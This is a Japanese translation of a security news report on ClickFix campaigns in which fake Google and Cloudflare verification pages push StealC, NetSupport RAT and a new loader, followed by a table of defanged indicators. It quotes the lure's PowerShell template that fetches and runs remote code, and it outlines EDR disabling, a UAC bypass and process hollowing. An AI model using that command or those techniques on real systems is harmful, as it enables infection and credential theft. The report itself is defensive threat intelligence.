脅威アクターは現在、Googleおよびcloudflareの検証システムを模倣した巧妙なClickFixソーシャルエンジニアリングキャンペーンを悪用し、StealC、HijackLoader、NetSupport RAT、さらに新たに確認されたローダーなど、複数の被害の大きいマルウェアファミリーを配布しています。
最近の脅威インテリジェンス調査によると、これらのキャンペーンは2025年後半から活動しており、ユーザーをだまして悪意あるPowerShellコマンドを手動で実行させています。これにより従来のセキュリティ対策を効果的に回避し、標的システムを完全に侵害することが可能になっています。
この攻撃チェーンは通常、Google reCAPTCHAやGoogle Meetのプロンプト、Cloudflareのセキュリティチェックに似せた「Verify you’re human(人間であることを確認してください)」や「Manual Verification Required(手動検証が必要です)」といった偽ページを利用します。
これらのページは、転用されたドメインや侵害されたウェブサイト、そしてCloudflare Pages(.pages.dev)のインフラ上でホストされています。被害者は次のようなコマンドをコピーして実行するよう指示されます。
powershellpowershell -c "iex(irm '{IP}:{Port}/{Path}')"
これらのコマンドで確認されたポートには、6600、9900、5506、7895、7493、149、8442などがあります。一部のキャンペーンでは、クリップボードインジェクションを通じて動的にペイロードを配信するIClickFixフレームワークも使用されています。

感染プロセスは通常、CustomCaptchaや「SECURITY GATEWAY」フレームワークなどのHTMLテンプレートに埋め込まれた、難読化されたもしくは平文のPowerShellコマンドから始まります。
このフレームワークには、GatewayRuntime、RemoteVault、BeaconDispatcherといったコンポーネントが含まれています。一部の亜種では、攻撃者はペイロードをリアルタイムで選択できる「承認ゲート」を実装しています。

その他の誘導手口としては、偽のGoogleログインアラート、QRコード生成ツール、Google Meetの「fix audio driver(音声ドライバーの修正)」を促すプロンプトなどがあり、/api/driver-clipboard.phpのようなエンドポイントがOS別のペイロードを返す仕組みになっています。
実行されると、PowerShellのダウンローダーはTempディレクトリにtmpXXXX.tmp.ps1という名前のスクリプトを配置します。このスクリプトはC:\ProgramData\Zoomsというディレクトリを作成し、Cloudflare R2バケットまたは攻撃者が管理するIPから第二段階のペイロードをダウンロードします。さらに一部のケースでは、http://{IP}/dl-callbackのようなエンドポイントへホストデータを窃取します。このインフラには一般的にASN Dedik Services Limited、Cloudflare R2ストレージ、そして特徴的な「hehe」というHTTPレスポンスが含まれます。
ペイロードの配布は非常にモジュール化されており、MSIインストーラー、ZIPアーカイブ、実行可能ローダーを通じてマルウェアを配布しています。確認されたペイロードのマッピングには、ResiLoaderとStealCを伴うトロイの木馬化されたElectronベースのFranzアプリケーションを配信するlibEGL.zip、Denoローダーおよび PowerShellスティーラーを展開するTest.msi、Amatera Stealerを配信するarworks.zip、Remusを展開するwater-night.zip、そしてNetSupport RATをインストールするSetup.msiまたはInvintrum_first.msiなどがあります。
その他のペイロードには、CastleLoader(traffic1.msi)やRustベースのスティーラー(ibrowser.exe)があり、いずれもDLLハイジャッキングを介して展開されることが多くなっています。

注目すべき感染チェーンの一つに、トロイの木馬化されたFranzアプリが関与するものがあります。このアプリは、これまで確認されていなかったResiLoaderと呼ばれるローダーをダウンロードします。難読化された.NET NativeAOT DLL(msys-crypto-3.dll)として実装されたこのローダーは、pcdhost.sysドライバーを用いたBYOD(Bring Your Own Driver)技術を使い、140を超えるAV/EDRプロセスを無効化します。
RUNレジストリキーとC:\ProgramData\Google Updateディレクトリを通じて永続化を確立し、ICMLuaUtil COMインターフェースを使ってUACバイパスを実行した上で、最終的にプロセスホロウイングを介してStealCスティーラーをServiceModelReg.exeに注入します。指令サーバー(C2)インフラとの通信はcompletstep[.]comなどのドメインを通じて行われます。
これらのキャンペーンは、onegeekworld[.]com、antibotv3[.]com、generator-qrcode[.]online、複数の.pages.devサブドメインといったドメインに加え、pub-7080e0c20a0e47ca95a476869c532367.r2[.]devのようなCloudflare R2バケットを含む広範なインフラを利用しています。
確認されているペイロード配布用IPには151.240.151[.]126、85.239.149[.]16、93.152.224[.]29、135.181.171[.]40があり、指令サーバー(C2)には146.19.248[.]120(StealC)、popularcard[.]shop(Rustスティーラー)、xzz[.]proxygrid[.]cc(Amatera)が含まれます。関連するマルウェアハッシュには72907d0ca3258365838626f6a8d993a6(ResiLoader)、0234E3188F2883A438B3F2BEAB7A78B2(StealC)、eee416efcb1e33f220cdb4b05496a07a(NetSupport RAT)があります。
このキャンペーンは、エクスプロイトを用いた配布に代わってソーシャルエンジニアリングを活用する、いわゆる「ユーザー支援型実行」手法の有効性が高まっていることを浮き彫りにしています。信頼されたブランドを悪用し、手動での操作を求めることで、攻撃者は検出率を大幅に下げつつ、柔軟な複数ペイロード配布能力を維持しています。
侵害指標(IoC)
| 種別 | 指標/値 | 備考 |
|---|---|---|
| マルウェア | ResiLoader DLL | StealCを展開し、BYODドライバーpcdhost.sysを介してAV/EDRを回避する新しい.NET NativeAOTローダー |
| ハッシュ | 72907d0ca3258365838626f6a8d993a6 | ClickFix Google/Cloudflareキャンペーンで確認されたResiLoader DLLサンプル |
| マルウェア | StealC | プロセスホロウイングによりServiceModelReg.exeに注入される情報窃取型マルウェア |
| ハッシュ | 0234E3188F2883A438B3F2BEAB7A78B2 | 本キャンペーンに関連するStealCペイロード |
| マルウェア | Remus Stealer | Cloudflare R2/IPインフラのwater-night.zip経由で配布 |
| ハッシュ | 6a9ac6b3fff7b695dbd4df6ff7f6c516 | Remusサンプルのハッシュ |
| マルウェア | Amatera Stealer | Zoomsフォルダチェーンのarworks.zip経由で配信 |
| ハッシュ | 206ce339febca0c3bcc850f42595fc63 | Amatera Stealerのハッシュ |
| マルウェア | NetSupport RAT | Setup.msi/Invintrum_first.msi経由でインストール |
| ハッシュ | eee416efcb1e33f220cdb4b05496a07a | NetSupportサンプルのハッシュ |
| マルウェア | Rust Stealer | ibrowser.exeとして投下、C2はpopularcard[.]shop |
| ハッシュ | b8d53740024d126cb55f83854335a4ab | Rustスティーラーのハッシュ |
| インフラ | onegeekworld[.]com, antibotv3[.]com, centralwildcats[.]com, regdev-google[.]com | 偽のGoogle/Cloudflare ClickFix認証ページをホスト |
| インフラ | .pages[.]dev (p-floribunds, pg-altirade2, pg-cordivant-m6, g-luminence) | 難読化されたSECURITY GATEWAYの誘導手口に使用されるCloudflare Pages |
| インフラ | generator-qrcode[.]online | PowerShellによる検証を要求する偽の「My QR Generator」ClickFixサービス |
| インフラ | pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev and other pub-.r2[.]dev buckets | ペイロードのZIP/MSIホスティングに使用されるCloudflare R2バケット |
| インフラ | completstep[.]com | トロイの木馬化されたFranz/ResiLoaderチェーンで使用されるローダーC2 |
| インフラ | 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40 | 「powershell iex(irm ‘IP:Port/Path’)」パターンで使用されるペイロード配布用IP |
| インフラ | 146.19.248[.]120 | このインフラクラスター内のStealC C2 |
注記: IPアドレスおよびドメインは、誤った名前解決やハイパーリンク化を防ぐため、意図的に無効化(defang、例: [.])されています。再有効化(re-fang)は、MISP、VirusTotal、あるいは自社のSIEMなど、管理された脅威インテリジェンスプラットフォーム内でのみ行ってください。
Windows、Linux、macOSの仮想マシンでサイバー脅威と対話し、完全な攻撃チェーンを再現 - ANY RUNでマルウェアとフィッシングを分析
翻訳元: https://gbhackers.com/fake-google-and-cloudflare-verification-pages-spread-malware/